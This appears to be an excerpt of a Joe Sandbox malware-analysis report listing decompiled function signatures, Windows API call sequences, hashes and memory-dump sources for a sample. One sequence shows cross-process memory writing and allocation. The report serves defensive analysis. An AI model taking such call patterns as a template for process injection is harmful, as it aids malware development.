                                                                                                                  • Instruction ID: 7344ab4bf3fa4ca11cbd052a114d881784a69ebd7392f7448dbeac3924690acd
                                                                                                                  • Opcode Fuzzy Hash: 58b90043669b3d91354c2cde667df83b66a416f9957cdeb9cacfa93f194a723b
                                                                                                                  • Instruction Fuzzy Hash: C5114832204306AFEB10AFE5EC45D9B37E8EF04774B10102DFA54B61D1DB71D89186A0
                                                                                                                  APIs
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
                                                                                                                  • GetLastError.KERNEL32(?,00E1A69F,?,?,?), ref: 00E1ABE1
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00E1A69F,?,?,?), ref: 00E1ABF0
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00E1A69F), ref: 00E1ABF7
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E1AC0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 883493501-0
                                                                                                                  • Opcode ID: 01f9553b0366f58d9c2258e1b19661d4d925675d2ec4680f520f125c8d6977d4
                                                                                                                  • Instruction ID: 3122b817a74d8857c06c1e9c48241e6eadca58812050429cb8d5dc1321e74ef4
                                                                                                                  • Opcode Fuzzy Hash: 01f9553b0366f58d9c2258e1b19661d4d925675d2ec4680f520f125c8d6977d4
                                                                                                                  • Instruction Fuzzy Hash: D9018170705205FFDB104FA6EC48DAB7BACEF8A3987140429F405E3250D6B1CC84CBA1
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.COMBASE ref: 00E19ADC
                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E19AF7
                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00E19B05
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00E19B15
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00E19B21
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3897988419-0
                                                                                                                  • Opcode ID: a0a7896fb218d611062a3a8a8f8f3fe3c77ed4cb3722bb141a166c9322769907
                                                                                                                  • Instruction ID: f538508bfe4dd3132bbebb5924a2b0e82f34134b1abef382182c1a9cf0091001
                                                                                                                  • Opcode Fuzzy Hash: a0a7896fb218d611062a3a8a8f8f3fe3c77ed4cb3722bb141a166c9322769907
                                                                                                                  • Instruction Fuzzy Hash: 4D017C76B04205AFDB144F55EC58E9A7AEDEB48395F144024F905F3211D7B0DD849BA0
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27A74
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E27A82
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E27A8A
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E27A94
                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2833360925-0
                                                                                                                  • Opcode ID: 5dabfff48c68170192e7c86390d937f06fdf7f1abdd8c6ca075e5134ef3766a6
                                                                                                                  • Instruction ID: 9e1b8645e3da4097e486a845c7e9f74aa4fc0bab2d8e481a1cda4e2d958730cb
                                                                                                                  • Opcode Fuzzy Hash: 5dabfff48c68170192e7c86390d937f06fdf7f1abdd8c6ca075e5134ef3766a6
                                                                                                                  • Instruction Fuzzy Hash: 52016D71D09629EFCF00AFE6EC49ADEBB78FB09361F400446D542B2150DB70965487A1
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E1AADA
                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E1AAE4
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1AAF3
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00E1AAFA
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1AB10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: c874e654707a22081d50cd6ed6878ed1b536f96f0c4945211f58f9623200a511
                                                                                                                  • Instruction ID: 9ee3c2df64d9412b4ad0412d013c6d0c5237db3a99b07a9e7248f0604c842c1d
                                                                                                                  • Opcode Fuzzy Hash: c874e654707a22081d50cd6ed6878ed1b536f96f0c4945211f58f9623200a511
                                                                                                                  • Instruction Fuzzy Hash: 8FF044717492446FDB111FA6FC88EB73B6DFF46794F440029F541E7150C6A198458A61
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E1AA79
                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E1AA83
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E1AA92
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E1AA99
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1AAAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: d4931f5efc14a9b70ad9096b57b061a7a9077cd552f118d4be6326ef96fba086
                                                                                                                  • Instruction ID: 8d669eb913f96ad7bd88be4a8a7a13df9dba2b6985a80c9bc996a4946c162bf0
                                                                                                                  • Opcode Fuzzy Hash: d4931f5efc14a9b70ad9096b57b061a7a9077cd552f118d4be6326ef96fba086
                                                                                                                  • Instruction Fuzzy Hash: 6DF0AF31306204AFEB101FA6AC88EB73BACFF4A798F440029F901E7190DAA19C45CB61
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E1EC94
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E1ECAB
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00E1ECC3
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00E1ECDF
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00E1ECF9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: 8ee035ce4c45676d337ce91a93086a242683cf90e75513796f8d61da90e4ad30
                                                                                                                  • Instruction ID: 02babb3732935152240484f19daad7b3b9e0473fea031e683e9e36e02917491e
                                                                                                                  • Opcode Fuzzy Hash: 8ee035ce4c45676d337ce91a93086a242683cf90e75513796f8d61da90e4ad30
                                                                                                                  • Instruction Fuzzy Hash: 00016230A047459BEB245B11EE4EBD6B778FB10745F441559F943715E0DBF0A9888B90
                                                                                                                  APIs
                                                                                                                  • EndPath.GDI32(?), ref: 00DFB0BA
                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00E5E680,00000000,?,?,?), ref: 00DFB0D6
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DFB0E9
                                                                                                                  • DeleteObject.GDI32 ref: 00DFB0FC
                                                                                                                  • StrokePath.GDI32(?), ref: 00DFB117
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: 28a9d8d81817f0485b3a30ee58d49f13b4331a224372643c1030fbe526a44501
                                                                                                                  • Instruction ID: 69fd91729b531045d93f21cdabb05a60181dd2257368e037b5b97c8c6215d847
                                                                                                                  • Opcode Fuzzy Hash: 28a9d8d81817f0485b3a30ee58d49f13b4331a224372643c1030fbe526a44501
                                                                                                                  • Instruction Fuzzy Hash: B7F01934108608EFCB219F66EC0C7653B65AB5A3B2F488355F525A40F0CB70996ACF20
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E2F2DA
                                                                                                                  • CoCreateInstance.COMBASE(00E6DA7C,00000000,00000001,00E6D8EC,?), ref: 00E2F2F2
                                                                                                                  • CoUninitialize.COMBASE ref: 00E2F555
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: .lnk
• API String ID: 948891078-24824748
• Opcode ID: e6aee58e282bf27c4ec336307c59119536eb5a18fa0174f596c39caace6ab736
• Instruction ID: dee0397fa71b85db7d2a55e4f655d46f810f401150262d70e2215b10fee0343e
• Opcode Fuzzy Hash: e6aee58e282bf27c4ec336307c59119536eb5a18fa0174f596c39caace6ab736
• Instruction Fuzzy Hash: B7A12A71104245AFD300EF64DC91DABB7E8EF98714F40491DF69597192EBB0EA09CBB2
APIs
  • Part of subcall function 00DE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DE53B1,?,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE662F
• CoInitialize.OLE32(00000000), ref: 00E2E85D
• CoCreateInstance.COMBASE(00E6DA7C,00000000,00000001,00E6D8EC,?), ref: 00E2E876
• CoUninitialize.COMBASE ref: 00E2E893
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: 65bf8726d3cc9b2b86988ce31b0e0af13c9eba0b7b92fea1ff68821d109484bc
• Instruction ID: c53b3bce4363f9ce4dbe464cdc4d4d69527e0b6f4b88506fffefa23aaa7a20c8
• Opcode Fuzzy Hash: 65bf8726d3cc9b2b86988ce31b0e0af13c9eba0b7b92fea1ff68821d109484bc
• Instruction Fuzzy Hash: EDA159756043219FCB14EF15C88492EB7E5FF88314F148989F995AB3A2CB31EC45CBA1
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00E032ED
  • Part of subcall function 00E0E0D0: __87except.LIBCMT ref: 00E0E10B
Strings
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 07d4add1f6db812951cceffe5ed235b1c16ef618f576809e2a65191d0c8d3124
• Instruction ID: 1772af5cd00d10683fa2ec1998bdee08cf80058991cfa9502789ba572ad9cdf8
• Opcode Fuzzy Hash: 07d4add1f6db812951cceffe5ed235b1c16ef618f576809e2a65191d0c8d3124
• Instruction Fuzzy Hash: 66515D31A092029ACB15B724C9413BA6BDCDB81714F24BD79F4D5B23F9EF388DC89642
APIs
• CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00E7DC50,?,0000000F,0000000C,00000016,00E7DC50,?), ref: 00E24645
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
• CharUpperBuffW.USER32(?,?,00000000,?), ref: 00E246C5
Strings
Similarity
• API ID: BuffCharUpper$__itow__swprintf
• String ID: REMOVE$THIS
• API String ID: 3797816924-776492005
• Opcode ID: f05f16aa30521e6d05a71e70eb8fb24da423084c973bd70c766a564991b9f454
• Instruction ID: a4f432d02319b9b265e692eb5bf6e020eaa7d46e593dc1bcb36004015359497a
• Opcode Fuzzy Hash: f05f16aa30521e6d05a71e70eb8fb24da423084c973bd70c766a564991b9f454
• Instruction Fuzzy Hash: A641E7B4A002699FCF01EF65D881AAEB7F5FF49304F14905AE916BB292DB30DD45CB60
APIs
  • Part of subcall function 00E2430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E1BC08,?,?,00000034,00000800,?,00000034), ref: 00E24335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E1C1D3
  • Part of subcall function 00E242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E1BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00E24300
  • Part of subcall function 00E2422F: GetWindowThreadProcessId.USER32(?,?), ref: 00E2425A
  • Part of subcall function 00E2422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00E2426A
  • Part of subcall function 00E2422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00E24280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E1C240
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E1C28D
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 9d43f4f3678fa69ae8737e09fd29d5a84ce8d7443897c6a144bd0a34a1c2b2a6
• Instruction ID: 36ec6a33b70ac4313c487c1d57ffa98137e3ce0c74d0ea9dcbb9360cde880dc4
• Opcode Fuzzy Hash: 9d43f4f3678fa69ae8737e09fd29d5a84ce8d7443897c6a144bd0a34a1c2b2a6
• Instruction Fuzzy Hash: 76414D72900228AFDB11EFA4DC81AEEB7B8FF09700F105095FA55B7191DB716E85CB61
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E7DC00,00000000,?,?,?,?), ref: 00E4A6D8
• GetWindowLongW.USER32 ref: 00E4A6F5
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E4A705
Strings
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 0babd111ce670a0b19b4e33241a36c2caedb294d20a44fc3c66259d04ed6fcc2
• Instruction ID: ee4ae19aef42363dc74eefcfeb6cade0f97afa7599b9c680af6d423c0ef072c3
• Opcode Fuzzy Hash: 0babd111ce670a0b19b4e33241a36c2caedb294d20a44fc3c66259d04ed6fcc2
• Instruction Fuzzy Hash: 9B31D231644209AFDB218E38EC45BEA77A9FB49378F195325F975E31E0C770AC509B60
APIs
• _memset.LIBCMT ref: 00E35190
• InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00E351C6
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |$D
• API String ID: 1413715105-465884809
• Opcode ID: b6efa88b2b7bb06a1a8929fc633f3328cb9b1630d1b3de7ccf3e3a176b565206
• Instruction ID: 31b247ec10a1d45607b8831ebdc128af926a71ea998cefc4511ac6c78a6c015b
• Opcode Fuzzy Hash: b6efa88b2b7bb06a1a8929fc633f3328cb9b1630d1b3de7ccf3e3a176b565206
• Instruction Fuzzy Hash: 3F313971C00119ABCF01AFE5CC85AEEBFB9FF19700F001019F905B6266DB31A946CBA4
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E4A15E
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E4A172
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00E4A196
Strings
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: 249467eab8008189a2b66e4ec292d5933be22749ba01660ebc35bb190ebc6593
• Instruction ID: c4f235a552aab6b061dc07cfe90836d49c3b7194c8d101548ef14b16640d6331
• Opcode Fuzzy Hash: 249467eab8008189a2b66e4ec292d5933be22749ba01660ebc35bb190ebc6593
• Instruction Fuzzy Hash: AF21F172540218ABDF118F94DC42FEA3B7AFF48764F051224FA55BB2D0D6B1AC54CBA0
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E4A941
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E4A94F
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E4A956
Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                  • String ID: msctls_updown32
                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                  • Opcode ID: c2b38591353a2f727ea64c4ab98f0682531bfbc1536614324905ca7bf0ac0312
                                                                                                                  • Instruction ID: 734ab5aaa0c821984c6f7bd73f0f9f68176771bf36396ce8d5d18b942f4426b4
                                                                                                                  • Opcode Fuzzy Hash: c2b38591353a2f727ea64c4ab98f0682531bfbc1536614324905ca7bf0ac0312
                                                                                                                  • Instruction Fuzzy Hash: A72165B5640209AFDB10DF15EC91D7737ADEB9E3A8B091059FA04A7351CB71EC11CB61
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E49A30
                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E49A40
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E49A65
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                  • String ID: Listbox
